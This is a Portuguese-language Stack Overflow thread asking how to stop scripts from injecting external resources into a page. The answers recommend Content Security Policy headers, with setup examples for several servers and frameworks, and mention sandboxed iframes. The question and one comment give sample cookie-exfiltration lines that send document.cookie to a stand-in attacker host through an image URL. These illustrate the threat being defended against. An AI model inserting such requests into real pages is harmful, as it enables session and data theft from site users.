# É possível prevenir injeção de recursos e requisições externas em uma página web?

Tags: segurança, xss

Supondo que exista alguma biblioteca da qual injete elementos de fontes externas como `<script>`, `<link>`, `<img>`, `<video>`, `<audio>`

Eventualmente podem ocorrer problemas como:

1. Abrir brechas de segurança como injetar scripts maliciosos
2. Capturar pelo `referer` a página de origem
3. Afetar a performance

É possível prevenir que um script injete com `document.createElement` (ou `innerHTML` ou `document.write`) elementos que acessem recursos externos?

Ou então é possível recursos que venham de fora dos domínios permitidos?

Por exemplo, impedir requisições de servidores externos:

### Impedir injeção de arquivos .js

```javascript
var inject = document.createElement("script");
inject.src = "//cdn.exemplo.com/script-injetado.js";
document.head.appendChild(test);
```

### Impedir injeção de arquivos de imagem e .css

Imagens, vídeos e outros recursos semelhantes podem pegar pelo `referer` a página de origem e no caso quero prevenir isto para evitar que saibam a página de origem, já que pode se tratar de uma URL restrita:

```javascript
var inject = document.createElement("img");
inject.src = "//cdn.exemplo.com/photo.js";
document.head.appendChild(inject);

var inject = document.createElement("link");
inject.rel = "stylesheet";
inject.type = "text/css";
inject.src = "//cdn.exemplo.com/photo.js";
document.head.appendChild(inject);
```

E como citou o [@mgibsonbr](https://pt.stackoverflow.com/questions/75479/%C3%89-poss%C3%ADvel-prevenir-inje%C3%A7%C3%A3o-recursos-externos-ou-requisi%C3%A7%C3%B5es-externas-para-maior?noredirect=1#comment154329_75479), podem enviar dados por método GET por exemplo:

```javascript
var inject = document.createElement("img");
inject.src = "//exemplo.com/imagem.jpg?cookie=" + document.cookie;
document.head.appendChild(inject);
```

Comment: "Eu sei que fotos e css não vão executar scripts maliciosos" mas eles podem capturar informações privadas do *browser* e enviar para domínios externos. Ex.: `<img src="http://atacante.example.com/kitty.jpg?cookie=algo_roubado_da_pagina_atual">`

Comment: @mgibsonbr Entendo, um exemplo que citei foi o referer. Editei obrigado. !

Answer (score 6, accepted):

Através dos headers é possível configurar o [CSP (Content Security Policy)](https://en.wikipedia.org/wiki/Content_Security_Policy) e com ele é possível bloquear requisições externas e até outros tipos "problemas" de segurança.

### Exemplo de header CSP:

Este header irá permitir requisições do mesmo domínio, irá impedir *scripts inline* e o uso do `eval()`:

```
Content-Security-Policy: default-src 'self'
```

Este header irá permitir requisições do mesmo dominio, irá impedir o `eval`, mas irá permitir os "scripts inline":

```
Content-Security-Policy: default-src 'self' 'unsafe-inline'
```

### Regras:

- `'none'`

  Refere a definição vazia; ou seja, que
- `'self'`

  Refere-se à origem a partir da qual o documento protegido está sendo chamado, incluindo o mesmo esquema de URL e número de porta. Alguns navegadores excluir especificamente "blob" e "sistema de arquivos" de diretivas de origem. Sites que necessitam para permitir que esses tipos de conteúdo pode especificá-los usando o atributo de dados.
- `'unsafe-inline'`

  Permite o uso de recursos inline, como `<script>alert(1);</script>` ou `<style>a {}</style>` e `javascript:` em eventos (por exemplo `<a href="javascript:alert(1);">`)
- `'unsafe-eval'`

  Permite o uso da função `eval()`

### Permitir blob e acesso ao arquivos de sistema

Muitos sistemas necessitam do uso de upload e criação de urls dinamicas, mas o `default-src 'self'` pode impedir isto, então use:

```
Content-Security-Policy: default-src 'self'; img-src 'self' data: blob: filesystem:; media-src mediastream:
```

<sub>Fonte: https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives</sub>

### PHP

Para usar isto com PHP é necessário usar o [`header`](http://php.net/manual/en/function.header.php):

```php
<?php

header('Content-Security-Policy: default-src \'self\'');
```

### Apache e .htaccess

Para usar o com Apache, você pode usar o httpd.conf ou o .htaccess e o `mod_headers`:

```apache
<IfModule mod_headers.c>
    Header set Content-Security-Policy "default-src 'self'"
</IfModule>
```

### IIS

Em servidores IIS

```iis
<set name="CONTENT_SECURITY_POLICY" value="default-src 'self'">
```

### CSharp (`System.Web`)

Com [c#](/questions/tagged/c%23) você pode acessar o `HttpContext` e setar em um variável chamada context:

```csharp
HttpResponse HS = context.Response;

HS.AddHeader("Content-Security-Policy", "default-src 'self'");
```

### Python

Com [django](/questions/tagged/django):

```python
def main(request):
    response = HttpResponse()
    reponse["Content-Security-Policy"] = "default-src 'self'"
```

Com [flask](/questions/tagged/flask) (neste caso define na rota `/`):

```python
@app.route("/")
def home():
    resp = flask.Response("foo")
    resp.headers['Content-Security-Policy'] = 'default-src \'self\''
    return resp
```

Comment: +1 Não conhecia esse CSP, mas já vejo que promete bastante. Eu sempre quis que os *browsers* implementassem algo como o [`hash-source`](http://www.w3.org/TR/CSP/#source-list-valid-hashes) no CSP nível 2, tomara que isso se popularize logo (no momento, [só o Chrome suporta](http://caniuse.com/#feat=contentsecuritypolicy2)). Sempre fiquei com um pé atrás com os CDNs justamente por isso (vai que um CDN qualquer é hackeado e substituem o jQuery por um arquivo malicioso, quantos sites no mundo seriam afetados?). Mas se for possível estabelecer um hash, então já não há mais problema.

Answer (score 7):

> **Atualização:** os *browsers* modernos implementam o *Content Security Policy* (CSP), que permitem que os sites orientem o *browser* no sentido de permitir/bloquear diversas coisas. Mais detalhes na [resposta do Guilherme Nascimento](https://pt.stackoverflow.com/a/75492/215).

Com JavaScript puro, não. É possível restringir alguma coisa dos scripts colocando-os em um `iframe` com o atributo `sandbox`, mas esse nível fino de controle é mais difícil.

Se você possui um script - externo ou não - e você quer garantir que ele somente faça aquilo que você explicitamente permitir, é necessário modificá-lo para chegar a esse fim. A princípio isso poderia ser feito no próprio *browser*, mas aí você precisaria de um *parser* de JavaScript em JavaScript (o que é viável, mas não muito eficiente). Outra opção é fazer isso em um servidor. O projeto [**google-caja**](https://code.google.com/p/google-caja/) se propõe justamente a isso.

Nunca utilizei, por isso não posso afirmar sua eficácia, mas a ideia é prover um modelo de segurança baseado em capacidades (*capability*), de modo que o script não tenha acesso ao objeto global e todas suas classes/funções, mas sim só àquilo que você disponibilizar a ele.

(Nota: em algumas circunstâncias, um código JavaScript contido em uma função pode ser executado no [modo *strict*](https://pt.stackoverflow.com/q/2746/215) de forma que ele também não acesse o objeto global, mas eu não contaria com isso para assegurar a segurança do site.)

[Essa resposta no security.SE](https://security.stackexchange.com/a/15193/6939) (em inglês) cita algumas outras ferramentas que podem ajudar nesse propósito.